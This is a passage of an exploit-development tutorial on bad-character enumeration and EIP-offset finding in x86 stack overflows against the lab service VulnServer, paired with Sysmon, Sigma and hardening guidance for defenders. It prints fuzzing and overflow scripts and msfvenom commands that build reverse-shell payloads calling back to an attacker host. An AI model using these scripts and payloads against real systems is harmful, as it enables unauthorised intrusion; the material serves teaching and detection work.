  • Null-byte and bad-character avoidance is a design constraint, not a post-step — xor for zero, reversed stack strings, runtime-supplied terminators.
  • Det

Bad Characters, Null Bytes, and Restricted Character Sets

Objective: Understand why certain bytes corrupt, truncate, or transform shellcode in stack-based buffer overflows, how to systematically enumerate a target’s restricted character set, and how to adapt encoding or instruction substitution to survive those constraints — alongside how defenders detect the resulting exploitation patterns.


1. What Are Bad Characters? The Concept Explained

A bad character is any byte that causes the vulnerable application’s input-handling routine to misbehave: to corrupt, truncate, or transform the payload before it lands intact in the target buffer. There is no universal set. The exact bad characters depend on the application’s parsing logic and the protocol in use.

Shellcode cannot contain bytes that the target interprets incorrectly — a newline, a delimiter, or a string terminator. The root cause is usually a string-handling function. C runtime (CRT) routines like strcpy, strncpy, strcat, sprintf, and the deprecated gets operate on null-terminated buffers and stop on specific sentinel bytes.

When you inspect memory after a crash, you are hunting for three distinct failure modes:

  • Missing bytes — characters stripped entirely by a sanitiser.
  • Altered bytes — characters transformed (e.g., \x80 appearing as \x01).
  • Premature termination — a byte that halts the copy, so nothing after it is written.

Identifying which bytes trigger these behaviors is a mandatory phase before any reliable shellcode can be placed.


[Figure: flow of a raw payload through a string API into three failure modes (missing bytes, altered bytes, premature truncation), each corrupting the payload before it reaches the destination buffer.]

2. Why \x00 Is Always the First Enemy

The null byte (\x00) is always a bad character in string-based overflows. C-style string functions treat \x00 as the terminator, so any shellcode byte following a null is silently discarded.

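Function | Behavior on \x00
strcpy | Stops copying at the first null
strncpy | Stops at the first null or after n bytes, whichever comes first
strlen | Returns the length up to the first null
sprintf | Ends a %s argument (and the format string itself) at the first null
gets | Stops at a newline rather than a null; legacy, present in old targets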

At the assembly level, strlen walks the buffer comparing each byte to zero and breaks on a match — that loop defines the truncation boundary. This is not a convention; it is a property of how the Windows CRT and Win32 LPSTR / LPWSTR parameters handle null-terminated strings.

Network contexts differ. A socket recv call reads up to a caller-specified byte count and does not interpret the data, so null bytes pass from the wire into the buffer unchanged. A \x00 may therefore survive transport but still die the moment the data hits a strcpy. Treat the string API and the socket as separate constraint layers.
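
The two layers can be modelled in a few lines. This is a simulation sketch, not target code: c_strcpy is a hypothetical helper that mimics how a C string copy stops at the first null, and received stands in for whatever recv would hand the application.

```python
def c_strcpy(src: bytes) -> bytes:
    """Simulate a C string copy: keep bytes up to (not including) the first null."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


# What recv() would deliver: the null byte survives transport untouched.
received = b"\x41\x42\x00\x43\x44"

# What a strcpy-style copy would leave in the destination buffer.
copied = c_strcpy(received)

print("after recv  :", received.hex(" "))
print("after strcpy:", copied.hex(" "))
```

Everything after the null is lost at the second layer, which is why a byte that looks fine in a packet capture can still be bad for the exploit.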


3. Common Bad Characters by Protocol and Context

Restrictions come from three sources: protocol-specific rules (HTTP terminating on \x0D\x0A), application sanitisation (stripping nulls or high bytes), and encoding layers (Base64 or Unicode transformations).

Byte | Hex | Reason
Null | \x00 | String terminator; always bad in string overflows
Line Feed | \x0A | Newline; terminates input in many protocol parsers
Carriage Return | \x0D | CR; terminates input lines (HTTP, SMTP, POP3)
Space | \x20 | Whitespace delimiter; terminates tokens in some parsers
0xFF (all bits set) | \xFF | Causes issues in some parsing contexts (for example, Telnet treats it as the IAC command byte)

A web server vulnerable in its URI handler is the canonical restricted-set case: the legal URI character set is small, and non-printable or extended characters are rejected outright, narrowing or preventing exploitation. SMTP, POP3, and FTP argument parsers each impose their own delimiters.


4. Building and Sending the Test Byte Array

The standard methodology: generate every non-null byte (\x01 through \xFF), place it after the EIP-overwrite offset, crash the target, and compare sent versus received in memory. Python builds the array cleanly:

# Generate \x01 through \xFF (255 bytes, null excluded)
badchar_test = bytearray(range(1, 256))

offset   = 2003                     # VulnServer TRUN EIP offset (illustrative)
buf      = b"A" * offset
buf     += b"B" * 4                 # EIP overwrite marker
buf     += bytes(badchar_test)      # byte array lands at ESP
buf     += b"C" * (3000 - len(buf)) # padding

You then deliver that buffer to the vulnerable service running under a debugger:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.10", 9999))
s.recv(1024)
s.sendall(b"TRUN /.:/" + buf)       # VulnServer TRUN command; sendall avoids a partial write
s.close()

After the crash, the \x01 through \xFF block should appear contiguously in memory, typically at or near ESP.


5. Inspecting Memory: Immunity Debugger and mona.py

In Immunity Debugger, follow ESP in the hex dump and use the mona plugin to diff what you sent against what landed.

!mona config -set workingfolder c:\mona\%p
!mona bytearray -cpb "\x00"
!mona compare -f c:\mona\bytearray.bin -a <ESP_address>

  • !mona config sets the output directory.
  • !mona bytearray -cpb "\x00" writes a reference bytearray.bin (all of \x01 through \xFF) excluding the specified bad chars. With the %p working folder set above, the file lands in a per-process subfolder of c:\mona, so point -f at that path.
  • !mona compare diffs the reference file against the live memory at the supplied ESP address and prints a per-byte verdict.

Annotated mona output looks like:

[+] Comparing with memory at address 0x00ab1a30
    Only the first 18 bytes were identical
    Possibly bad chars: 0a 0d
[+] Bytes omitted from input: ...

6. Iterative Elimination: Narrowing the Bad List

Mona flags where the sequence diverges. The critical nuance: only the first byte of a corrupted run is necessarily bad. Subsequent corruption is often a knock-on effect of that first offender shifting alignment.

If memory shows 11 12 13 15 with 14 missing, then \x14 is the only confirmed bad character at that step — not \x15 or anything after it. Add \x14 to your exclusion list, regenerate, and re-run:

BADCHARS = b"\x00\x0a\x0d"          # grows one confirmed byte per pass

full = bytearray(range(1, 256))
test = bytes(b for b in full if b not in BADCHARS)

# rebuild buffer with `test`, resend, re-inspect under the debugger

Repeat the send → inspect → eliminate cycle until the entire \x01 through \xFF block (minus the confirmed bad bytes) appears intact at ESP. Mirror the same exclusion list in !mona bytearray -cpb "..." so the reference file matches.
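
The "first byte only" rule is easy to encode. The sketch below assumes you have copied the observed bytes out of the debugger by hand; first_bad_byte is a hypothetical helper, not part of mona.

```python
def first_bad_byte(sent: bytes, observed: bytes):
    """Return (offset, byte) for the first sent byte that did not land intact, else None."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return i, b
    return None


sent = bytes([0x11, 0x12, 0x13, 0x14, 0x15])
observed = bytes([0x11, 0x12, 0x13, 0x15])   # \x14 was stripped in transit

hit = first_bad_byte(sent, observed)
if hit is not None:
    offset, byte = hit
    print(f"first divergence at offset {offset}: \\x{byte:02x}")
```

The function deliberately stops at the first mismatch. Everything after it is shifted, so reporting later differences would only add bytes that are probably innocent.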


[Figure: the iterative bad-character elimination cycle: generate byte array, send, crash and inspect, diff with mona, confirm the bad byte, add it to the exclusion list, and repeat until the array survives intact. Only the first byte of a corrupted run is confirmed bad.]

7. Encoding Shellcode with msfvenom

Once the bad-char set is known, generate shellcode that avoids it. msfvenom’s -b flag specifies the forbidden bytes; it then picks an encoder (typically x86/shikata_ga_nai for x86 payloads) to re-encode around them.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20' -e x86/shikata_ga_nai -f python

x86/shikata_ga_nai (ranked excellent) is a polymorphic XOR additive-feedback encoder. It reorders instructions and dynamically selects registers, producing different output each run and frustrating signature-based detection.

Size overhead is real. Encoding inflates the payload — a 71-byte stub can grow to 98 bytes after one shikata_ga_nai pass. Account for buffer space accordingly.

Failure case: when the bad-char list is too restrictive, shikata_ga_nai may abort with "A valid opcode permutation could not be found". Fall back to an alternative encoder:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20\xff' -e x86/call4_dword_xor -f python

x86/call4_dword_xor and x86/countdown use different decoder stubs that may satisfy tighter constraints.
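
Whichever encoder you end up with, it is worth confirming the output yourself rather than trusting the tool. A minimal sketch, assuming the generated bytes have been pasted into a Python variable; find_bad_bytes is a hypothetical helper and the candidate bytes are placeholders, not a real payload.

```python
def find_bad_bytes(shellcode: bytes, badchars: bytes):
    """Return (offset, byte) pairs for every forbidden byte found in shellcode."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


BADCHARS = b"\x00\x0a\x0d\x20"

# Placeholder bytes standing in for encoder output.
candidate = b"\x90\x90\x0a\xcc\x20"

for offset, byte in find_bad_bytes(candidate, BADCHARS):
    print(f"offset {offset}: \\x{byte:02x} is in the bad-char list")
```

An empty result means the blob is clean against the current list; it says nothing about bytes you have not yet identified as bad.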


[Figure: msfvenom encoder selection driven by the bad-char list: shikata_ga_nai by default, call4_dword_xor as fallback, and alpha_mixed for printable-only constraints, escalating when the default cannot find a valid opcode permutation.]

8. Alphanumeric and Printable-Only Constraints

When so many bytes are forbidden that standard encoders fail, switch to printable-ASCII-only output. x86/alpha_mixed (msfvenom) and the standalone Alpha2 tool emit shellcode built from alphanumeric characters, a subset of the printable \x21 through \x7E range, which is ideal when the target only passes printable URI characters.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -e x86/alpha_mixed BufferRegister=ESP -f python

The BufferRegister option tells the decoder which register points to the payload, removing the self-locating GetPC stub. The trade-off is size — an alphanumeric payload can balloon to 710 bytes or more. When the available buffer cannot hold an inflated payload, stage a small egghunter to search memory for a larger second-stage payload placed elsewhere.


9. Instruction Substitution: Jumping Without Bad Opcodes

Sometimes the bad character lives in your jump opcode, not your shellcode body. The short JMP maps to \xEB, and \xEB is frequently bad in HTTP and other network-protocol targets — so the instruction cannot be used as-is.

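Instruction | Opcode bytes | Notes
JMP SHORT +6 | \xEB \x06 | \xEB often restricted
JE / JNE pair | \x74 .. \x75 .. | Complementary conditions; exactly one of the two branches is always taken
Near JMP | \xE9 .. .. .. .. | Alternative when \xEB is bad; the rel32 operand contains null bytes for small forward jumps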
A bad-char-safe substitution uses a conditional pair that, regardless of the zero flag, always transfers control:

    ; JMP SHORT replacement using complementary conditionals
    je  short target     ; 74 xx  -> jump if ZF=1
    jne short target     ; 75 xx  -> jump if ZF=0
    ; one branch is always taken; no \xEB byte present
target:
    ; decoder / shellcode continues here

In SEH overwrites, the 4-byte nSEH field typically holds a JMP SHORT that hops over the adjacent handler pointer into the payload, so its opcode bytes must also dodge the bad-char set. Use mona or WinDbg to locate suitable jump equivalents and clean POP POP RET gadgets.
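
The displacement arithmetic for the pair is where mistakes creep in, so here is a small sketch of it. je_jne_pair is a hypothetical helper; the only assumption is the standard rel8 encoding, where the displacement counts from the end of each 2-byte instruction.

```python
def je_jne_pair(distance: int) -> bytes:
    """Encode 'je short T; jne short T', with T `distance` bytes past the end of the JE.

    The JNE sits 2 bytes later than the JE, so it needs a displacement
    2 smaller to reach the same target.
    """
    if not 2 <= distance <= 127:
        raise ValueError("distance must be a forward rel8 that clears the JNE")
    return bytes([0x74, distance, 0x75, distance - 2])


pair = je_jne_pair(6)
print(pair.hex(" "))
assert 0xEB not in pair   # no short-JMP opcode present
```

The result is exactly four bytes, so it fits an nSEH field. A distance of 2 produces a \x00 displacement in the JNE, so check the output against your bad-char list before using it.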


10. Unicode / Wide-Character Transformations

A distinct constraint class: some applications convert input via MultiByteToWideChar() (Win32) or mbstowcs() (CRT), expanding each byte to a wide character and effectively inserting a null after every byte. This breaks shellcode alignment entirely — it is transformation, not stripping.

# You send:        \x41\x42
# Memory shows:    \x41\x00\x42\x00   <- a null inserted after every byte
sent     = b"\x41\x42"
observed = b"\x41\x00\x42\x00"        # Unicode expansion in the debugger

A naive \x01 through \xFF array will look catastrophically corrupted under this transformation because every byte appears null-padded. The classical mitigation is Venetian shellcode, manually constructed so that the injected null bytes become harmless padding instructions, letting the real opcodes survive expansion. Identify these buffers by spotting the regular \x00 interleave in the hex dump.
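
Spotting the interleave can be automated. The sketch below approximates the expansion for ASCII-range bytes only; real conversions of bytes above \x7F depend on the active code page, which this does not model. Both function names are hypothetical.

```python
def widen(data: bytes) -> bytes:
    """Approximate an ANSI-to-UTF-16LE expansion for bytes in the ASCII range."""
    return data.decode("ascii").encode("utf-16-le")


def looks_widened(observed: bytes) -> bool:
    """True when every second byte is null, the signature of wide-character expansion."""
    return (
        len(observed) >= 2
        and len(observed) % 2 == 0
        and set(observed[1::2]) == {0}
    )


sent = b"\x41\x42"
observed = widen(sent)
print(observed.hex(" "))
print(looks_widened(observed))
```

Run looks_widened against the bytes you read at ESP before starting normal bad-char elimination; a positive result means the byte-by-byte diff will be misleading.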


11. Common Attacker Techniques

Technique | Description
Bad-char enumeration | Inject \x01 through \xFF, diff memory, identify forbidden bytes
Shellcode encoding | Re-encode with shikata_ga_nai / call4_dword_xor to avoid bad bytes
Alphanumeric shellcode | alpha_mixed / Alpha2 for printable-only constraints
Jump substitution | Replace \xEB with JE/JNE pairs or near JMP
Venetian shellcode | Survive Unicode expansion in wide-character buffers
Egghunter staging | Small finder stub locating a larger payload in tight buffers

These are pre-exploitation tradecraft — they enable shellcode delivery but execution and payload behavior are what generate detectable telemetry.


12. Defensive Strategies & Detection

Bad-char testing itself is quiet, but the encoded shellcode it produces is loud once it executes from unbacked memory.

Event ID | Name | Relevance
1 | Process Creation | Frameworks (Metasploit, Empire) launching payloads
3 | Network Connection | Outbound C2 from an exploited process
8 | CreateRemoteThread | Post-exploitation thread injection
10 | ProcessAccess | Cross-process open by injected payload
11 | FileCreate | Shellcode or payload dropped to disk

Sysmon Event ID 10 (ProcessAccess) is the primary signal. Shellcode executing from anonymous stack or heap memory produces a CallTrace containing UNKNOWN frames — code with no backing image on disk.

title: Shellcode Injection via Suspicious Process Access
logsource:
  category: process_access
  product: windows
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
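
If you want to test that logic against exported events before deploying the rule, the same three conditions can be applied in Python. This is a sketch under assumptions: events are already parsed into dicts keyed by Sysmon field names, and the two sample records are hand-written, hypothetical data.

```python
SUSPICIOUS_ACCESS = {"0x147a", "0x1f3fff"}   # access masks listed in the rule


def matches_rule(event: dict) -> bool:
    """Apply the rule's three conditions to one parsed Sysmon event."""
    return (
        event.get("EventID") == 10
        and str(event.get("GrantedAccess", "")).lower() in SUSPICIOUS_ACCESS
        and "UNKNOWN" in str(event.get("CallTrace", ""))
    )


# Hypothetical records; real events carry many more fields.
events = [
    {"EventID": 10, "GrantedAccess": "0x1F3FFF",
     "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|UNKNOWN(00000000001A0F2C)"},
    {"EventID": 10, "GrantedAccess": "0x1000",
     "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4"},
]

hits = [e for e in events if matches_rule(e)]
print(f"{len(hits)} of {len(events)} events match")
```

Only the first record matches: it has both a listed access mask and an unbacked frame in its call trace.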

Additional telemetry and hardening:

  • ETW — subscribe to Microsoft-Windows-Threat-Intelligence (ETWTI) to observe injection and memory manipulation; Microsoft-Windows-Security-Auditing for process audit events.
  • Audit Process Creation (Detailed Tracking) → Security Event 4688 with command-line logging captures framework invocations.
  • WAF / network — flag URI patterns carrying buffer-overflow payloads; a burst of access-violation or segfault alerts in a short window signals active exploitation attempts.
  • Compiler and linker mitigations: /GS, /SAFESEH, /DYNAMICBASE, and /NXCOMPAT raise the exploitation bar.
  • Input validation — allowlist legal characters at the boundary; explicitly reject \x00, \x0A, \x0D.
  • WDEG — enforce DEP and CFG per-process via Set-ProcessMitigation.
  • Memory integrity — flag executable pages not backed by a known on-disk image.
  • Deploy Sysmon with a community baseline (SwiftOnSecurity, olafhartong sysmon-modular) to ensure EID 10 captures CallTrace.

[Figure: an exploit attempt mapped to detection and mitigation layers: network WAF, OS mitigations such as DEP and CFG, Sysmon Event ID 10 with UNKNOWN CallTrace, ETWTI injection telemetry, and Security Event 4688 process-creation logging. Encoded shellcode may evade transport filters but still generates runtime telemetry.]

13. Tools for Bad-Character Analysis

Tool | Description | Link
Immunity Debugger | Crash analysis, ESP dump inspection | immunityinc.com
mona.py | Bytearray generation and memory comparison | github.com/corelan
WinDbg | Opcode/gadget inspection, memory diffing | microsoft.com
msfvenom | Shellcode generation and encoding (-b) | offsec.com
Alpha2 | Standalone alphanumeric shellcode encoder | github.com
x64dbg | User-mode debugging and patching | x64dbg.com
Ghidra | Static opcode/disassembly analysis | ghidra-sre.org
Volatility | Memory forensics, unbacked code regions | volatilityfoundation.org

14. MITRE ATT&CK Mapping

Bad-char testing and shellcode crafting are pre-exploitation tradecraft with no standalone technique ID — they enable the techniques below.

Technique | MITRE ID | Detection
Exploitation for Client Execution | T1203 | Process crash bursts, EID 1 framework launches
Exploit Public-Facing Application | T1190 | WAF anomalies, service access violations
Exploitation for Privilege Escalation | T1068 | Local overflow → elevated process behavior
Obfuscated Files or Information | T1027 | Encoder signatures (shikata/alpha) on disk/wire
Process Injection | T1055 | Sysmon EID 8/10, UNKNOWN in CallTrace

Summary

  • Bad characters are application-defined bytes that corrupt, truncate, or transform shellcode before it lands in memory; enumerate them empirically, never assume.
  • \x00 is always bad in string-based overflows because CRT functions like strcpy and strlen treat it as the terminator; sockets pass it but downstream string APIs still die on it.
  • Enumerate with a \x01 through \xFF byte array, diff memory using !mona compare, and remember only the first byte of a corrupted run is confirmed bad.
  • Adapt with msfvenom -b encoding (shikata_ga_nai, falling back to call4_dword_xor or alpha_mixed), jump-opcode substitution, and Venetian shellcode for Unicode buffers.
  • Detect the resulting payloads via Sysmon Event ID 10 with UNKNOWN CallTrace frames, ETWTI injection telemetry, and process-creation auditing (4688).

Finding the EIP Offset: Pattern Creation and Cyclic Patterns

Objective: Understand how to determine the exact EIP overwrite offset in a classic x86 stack-based buffer overflow by sending a cyclic (De Bruijn-derived) pattern, reading the value loaded into EIP at crash time, and calculating the precise byte distance from the buffer’s start to the saved return address — a repeatable, tool-agnostic workflow for authorized lab use.


1. Prerequisites and Lab Setup

This workflow assumes an isolated, authorized lab VM — never a production host. The classic offset-finding exercise targets a purpose-built vulnerable service such as vulnserver.exe or brainpan.exe, attached to a debugger.

You will need:

Component | Role
Immunity Debugger | Attach to the target process and read register state at crash time.
mona.py | Pattern generation and offset search inside Immunity.
Kali + Metasploit | msf-pattern_create / msf-pattern_offset wrappers.
Python 3 (+ pwntools) | Scripted fuzzing, pattern delivery, and cyclic() math.

Attach Immunity to the running service (File → Attach), press F9 to resume, then drive input from your Python script across the network. Configure mona’s working folder first:

!mona config -set workingfolder c:\mona\%p

2. The x86 Stack Frame: Why EIP Is the Target

EIP (Extended Instruction Pointer) is the 32-bit register holding the address of the next instruction. On function return, the ret instruction pops the saved return address off the stack into EIP. If you can overwrite that saved value, you control where execution flows next.

On a standard MSVC/GCC x86 cdecl frame, the layout is:

[  local buffer (N bytes)  ]   <- lower address, ESP near here after the prologue
[  saved EBP (4 bytes)     ]
[  saved EIP (4 bytes)     ]   <- overwrite target
[  function arguments      ]   <- higher address

The saved EIP sits above the saved EBP in the stack image. The offset is the byte distance from byte 0 of your input buffer to the first byte of saved EIP. ESP matters too: after ret, ESP advances past the popped return address and typically points directly into your attacker-controlled buffer region — the basis for later JMP ESP stages.


[Figure: x86 cdecl stack frame with the input buffer overflowing upward through local variables and saved EBP into the saved EIP, which sits just above the saved EBP; the position of ESP after ret is marked.]

3. From Fuzzing to Approximate Crash Size

The prior stage — fuzzing — delivers progressively larger buffers of A bytes (\x41) until the service dies. When the debugger shows EIP = 41414141, the saved return address has been fully overwritten with As. That confirms EIP control but tells you nothing about where in the buffer EIP lands.

import socket, time

ip, port = "192.168.56.10", 9999
size = 100
last_sent = 0                        # largest buffer delivered without error
while True:
    try:
        with socket.create_connection((ip, port), timeout=5) as s:
            buf = b"A" * size
            s.sendall(b"TRUN /.:/" + buf)   # protocol-specific prefix
            print(f"[*] Sent {size} bytes")
        last_sent = size
        size += 100
        time.sleep(1)
    except OSError:                  # refused, reset, or timed-out connection
        print(f"[!] Service stopped responding; last buffer sent was {last_sent} bytes")
        break

Round the crash size up to a clean number — say 2000 bytes. That value becomes the pattern length.


4. The Mathematics of Cyclic Patterns

EIP = 41414141 is ambiguous because every byte is identical. The fix is a cyclic pattern: a string in which every fixed-length substring appears exactly once. Find which substring landed in EIP, and you have the offset.

Concept | Detail
De Bruijn sequence | A sequence where every possible subsequence of a fixed length appears exactly once. This uniqueness is what makes offset lookup deterministic.
Why it works | The overwriting bytes are popped into EIP on ret. Because each 4-byte window is unique, the EIP value maps to exactly one position in the input.
Metasploit variant | Metasploit patterns use a different algorithm than true De Bruijn but serve the same purpose, drawing from uppercase letters, lowercase letters, and digits.
3-char uniqueness | pattern_create emits three-character groups (uppercase, lowercase, digit) that never repeat until the character sets are exhausted at 20,280 bytes: Aa0Aa1Aa2Aa3Aa4....

pwntools cyclic() generates a true De Bruijn sequence; msf-pattern_create uses the alphabet-based approach. Both yield a unique mapping you can query.
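
To see why the alphabet-based approach works, it helps to build one by hand. The sketch below is a re-implementation in the Metasploit style for illustration, not the framework's own code; pattern_create and pattern_offset here are local, hypothetical functions that only borrow the tool names.

```python
from itertools import product
import string

MAX_LEN = 26 * 26 * 10 * 3   # triplets run out after 20,280 bytes


def pattern_create(length: int) -> bytes:
    """Build an upper/lower/digit pattern: Aa0Aa1Aa2..."""
    if not 0 <= length <= MAX_LEN:
        raise ValueError(f"length must be between 0 and {MAX_LEN}")
    triplets = product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    out = []
    while len(out) * 3 < length:
        out.append("".join(next(triplets)))
    return "".join(out)[:length].encode("ascii")


def pattern_offset(pattern: bytes, window: bytes) -> int:
    """Return the offset of a 4-byte window, or -1 when it is absent."""
    return pattern.find(window)


pattern = pattern_create(2000)
windows = [pattern[i:i + 4] for i in range(len(pattern) - 3)]
assert len(windows) == len(set(windows))   # every 4-byte window is unique

print(pattern[:15].decode())
print(pattern_offset(pattern, b"Aa1A"))
```

The uniqueness assertion is the whole point: because no 4-byte window repeats, a single find is enough to turn a register value into an offset.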


[Figure: the cyclic-pattern offset workflow: fuzzing crash, pattern generation, delivery, EIP value capture, offset calculation, and BBBB verification. Unique 4-byte windows reduce the offset problem to a single deterministic lookup.]

5. Generating the Pattern: Three Tool Paths

Generate a pattern equal to (or slightly larger than) the crash size. The -l flag is length; the -q flag (used in section 7) is the query value.

Metasploit (Bash):

# Generate a 2000-byte non-repeating pattern
msf-pattern_create -l 2000
# Or the script directly:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000

mona.py (Immunity command bar):

!mona pc 2000

pwntools (Python 3):

from pwn import *
pattern = cyclic(2000)
print(pattern)

Tip: Generate a pattern 400 bytes larger than the crash buffer to also reveal whether shellcode space exists immediately after the EIP overwrite.


6. Sending the Pattern and Capturing the EIP Value

Replace the A buffer in your fuzzing script with the generated pattern, reattach Immunity, and reproduce the crash.

import socket

pattern = b"Aa0Aa1Aa2Aa3Aa4..."   # paste msf-pattern_create -l 2000 output
ip, port = "192.168.56.10", 9999

with socket.create_connection((ip, port)) as s:
    s.send(b"TRUN /.:/" + pattern)

When the process faults, read the 4-byte EIP value from Immunity’s register panel — for example 6F43396E.

Little-endian note: Values are written to the stack least-significant-byte first, so the debugger displays the four pattern bytes in reverse order, e.g. 6F43396E. Tools like pattern_offset handle endianness internally, so pass the displayed value as-is. A manual ASCII lookup, however, requires reversal: 6F43396E → 6E 39 43 6F → "n9Co".
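
The reversal is a one-liner if you would rather not do it in your head. A minimal sketch; eip_to_pattern_bytes is a hypothetical helper name.

```python
def eip_to_pattern_bytes(eip_hex: str) -> bytes:
    """Turn the register value shown by the debugger into the bytes as they sat in memory."""
    return bytes.fromhex(eip_hex)[::-1]


chunk = eip_to_pattern_bytes("6F43396E")
print(chunk.decode("ascii"))
```

The resulting four characters are what you search for in the raw pattern text when doing the lookup manually.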


7. Calculating the Exact Offset

Feed the EIP value into any of the three tools. All return the same byte distance.

Metasploit (Bash):

# -q is the query switch; pass the EIP value from the debugger
msf-pattern_offset -l 2000 -q 6F43396E
# Output:
# [*] Exact match at offset 1978

mona.py (Immunity): findmsp searches every register and the stack against the pattern.

!mona findmsp -distance 2000

Read the log line:

EIP contains normal pattern : ... (offset 1978)

(!mona po 6F43396E performs the same lookup by hex value.)

pwntools (Python 3): cyclic_find accepts the packed 4-byte value.

from pwn import *
offset = cyclic_find(p32(0x6161616c))   # example EIP value from a cyclic() pattern, not the Metasploit one
print(offset)                            # -> integer byte offset

gdb-peda’s pattern_search reports the EBP, EIP, and ESP offsets at once on Linux targets (e.g. EIP+0 found at offset: 1040 and [ESP] --> offset 1044), which is useful for spotting where ESP lands relative to EIP.


8. Verifying EIP Control

Never trust a calculated offset blindly. Confirm it by overwriting EIP with a known marker. Set payload to empty and retn to "BBBB":

import socket

prefix   = b"TRUN /.:/"
offset   = 1978
overflow = b"A" * offset
retn     = b"BBBB"          # 0x42424242
payload  = b""              # no payload yet — verification only

buf = prefix + overflow + retn + payload

with socket.create_connection(("192.168.56.10", 9999)) as s:
    s.send(buf)

Reload the app in Immunity and re-send. If the offset is correct, EIP shows 42424242 — the hex of “BBBB”. You now control execution flow exactly. Confirm ESP also points into your buffer; that location holds the bytes that follow retn and becomes your future code-redirect landing zone.

The conceptual stack image after the overwrite:

[ AAAA AAAA ... AAAA ]   offset bytes filling buffer + saved EBP
[ BBBB ]                 saved EIP = 0x42424242  (controlled)
[ CCCC ... ]             ESP region (future shellcode space)

[Figure: stack after a controlled EIP overwrite: padding up to the exact offset, BBBB in the saved EIP slot, and ESP pointing to the attacker-controlled region immediately after. EIP = 0x42424242 confirms the offset; ESP in the buffer is the basis for a JMP ESP redirect.]

9. Common Pitfalls and Edge Cases

  • Pattern shorter than the real offset: EIP holds bytes from beyond your pattern; the offset tool returns no match. Regenerate longer.
  • Bad characters: Bytes like \x00, \x0a, \x0d can truncate or corrupt the pattern mid-stream, shifting EIP unpredictably. Bad-char analysis is a separate stage.
  • Modern mitigations: ASLR and DEP/NX invalidate the naive EIP→ESP→shellcode chain on hardened targets. The offset still exists, but exploitation requires bypasses (covered in later tutorials).
  • SEH-based overflows: When the buffer overruns the Structured Exception Handler instead of the saved return address, EIP may not show pattern bytes directly — !mona findmsp will instead report the offset to the SEH/nSEH records.

10. Common Attacker Techniques

Offset discovery is a development sub-step that feeds the techniques below.

Technique | Description
Stack buffer overflow | Overrun a fixed local buffer to overwrite the saved return address.
Cyclic pattern offset finding | Deterministically locate the EIP overwrite distance, as taught here.
EIP redirection via JMP ESP | Once the offset is known, replace retn with the address of a JMP/CALL ESP gadget.
SEH overwrite | Variant overflow that hijacks the exception handler chain instead of ret.

11. Defensive Strategies and Detection

Detection splits into two contexts: catching exploitation attempts against a service, and catching the crash-loop behaviour of fuzzing/pattern delivery.

Crash and process telemetry:

  • Application Error — Event ID 1000 (Application log): logged on 0xC0000005 (Access Violation) when EIP corruption kills the process; the faulting address is the pattern value (e.g. 0x41307241).
  • Windows Error Reporting — Event ID 1001: WER bucket data, faulting instruction pointer, and dump path for post-crash forensics.
  • Sysmon Event ID 3 (Network Connection): repeated high-rate TCP connections to a single service port during fuzzing and pattern delivery are anomalous — watch DestinationPort and SourceIp.
  • Sysmon Event ID 1 (Process Create): child processes spawned if the overflow reaches code execution — inspect CommandLine, ParentImage, IntegrityLevel.

ETW providers: Microsoft-Windows-WER-SystemErrorReporting emits access-violation crash events; Microsoft-Windows-Kernel-Process reveals abnormal crash-and-restart loops via process start/stop events. Forward both to a SIEM.

A repeated-crash detection sketch (illustrative):

title: Repeated Application Crash Loop (Possible Buffer Overflow Fuzzing)
logsource:
  product: windows
  service: application
detection:
  selection:
    EventID: 1000
    ExceptionCode: '0xc0000005'   # Access Violation
  timeframe: 1m
  condition: selection | count() > 5   # repeated crashes = fuzzing indicator
level: high
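
The same threshold logic can be prototyped outside the SIEM. This sketch assumes you have already extracted the crash timestamps for one service from Event ID 1000 records; crash_bursts is a hypothetical helper and the sample timestamps are made up.

```python
from collections import deque
from datetime import datetime, timedelta


def crash_bursts(timestamps, window=timedelta(minutes=1), threshold=5):
    """Yield each timestamp at which more than `threshold` crashes fall inside `window`."""
    recent = deque()
    for ts in sorted(timestamps):
        recent.append(ts)
        # Drop crashes that have aged out of the sliding window.
        while ts - recent[0] > window:
            recent.popleft()
        if len(recent) > threshold:
            yield ts


# Made-up data: seven crashes, eight seconds apart.
start = datetime(2024, 1, 1, 12, 0, 0)
crashes = [start + timedelta(seconds=8 * i) for i in range(7)]

alerts = list(crash_bursts(crashes))
print(f"{len(alerts)} alert(s), first at {alerts[0]}")
```

A sliding window avoids the blind spot of fixed one-minute buckets, where a burst that straddles a bucket boundary can slip under the threshold.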

Hardening checklist (raises the bar from “find the bug” to “bypass every mitigation”):

  • Compile with /GS stack security cookies — a mismatch triggers __security_check_cookie() and terminates before ret.
  • Enable DEP/NX system-wide: bcdedit /set nx AlwaysOn.
  • Enable ASLR: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages = 1.
  • Compile with Control Flow Guard: /guard:cf.
  • Link with SafeSEH (/SAFESEH) to block SEH overwrites on x86.
  • Replace unbounded strcpy, gets, scanf("%s", ...) with strcpy_s, strncpy_s, gets_s.
  • Run Application Verifier with heap and stack checks during development.

These map to MITRE mitigation M1050 — Exploit Protection.


12. Tools for Offset Analysis

Tool | Description | Link
msf-pattern_create / pattern_create.rb | Generate a non-repeating pattern of length -l. | metasploit.com
msf-pattern_offset / pattern_offset.rb | Query offset with -q <EIP_HEX>. | metasploit.com
mona.py | !mona pc, !mona findmsp, !mona po inside Immunity. | github.com
Immunity Debugger | Attach, reproduce crash, read EIP/ESP. | immunityinc.com
pwntools | cyclic() / cyclic_find() De Bruijn math. | github.com
GDB + PEDA | pattern_search reports EBP/EIP/ESP offsets. | github.com

13. MITRE ATT&CK Mapping

Offset finding is a pre-exploitation development sub-step with no dedicated technique ID; it supports the techniques below.

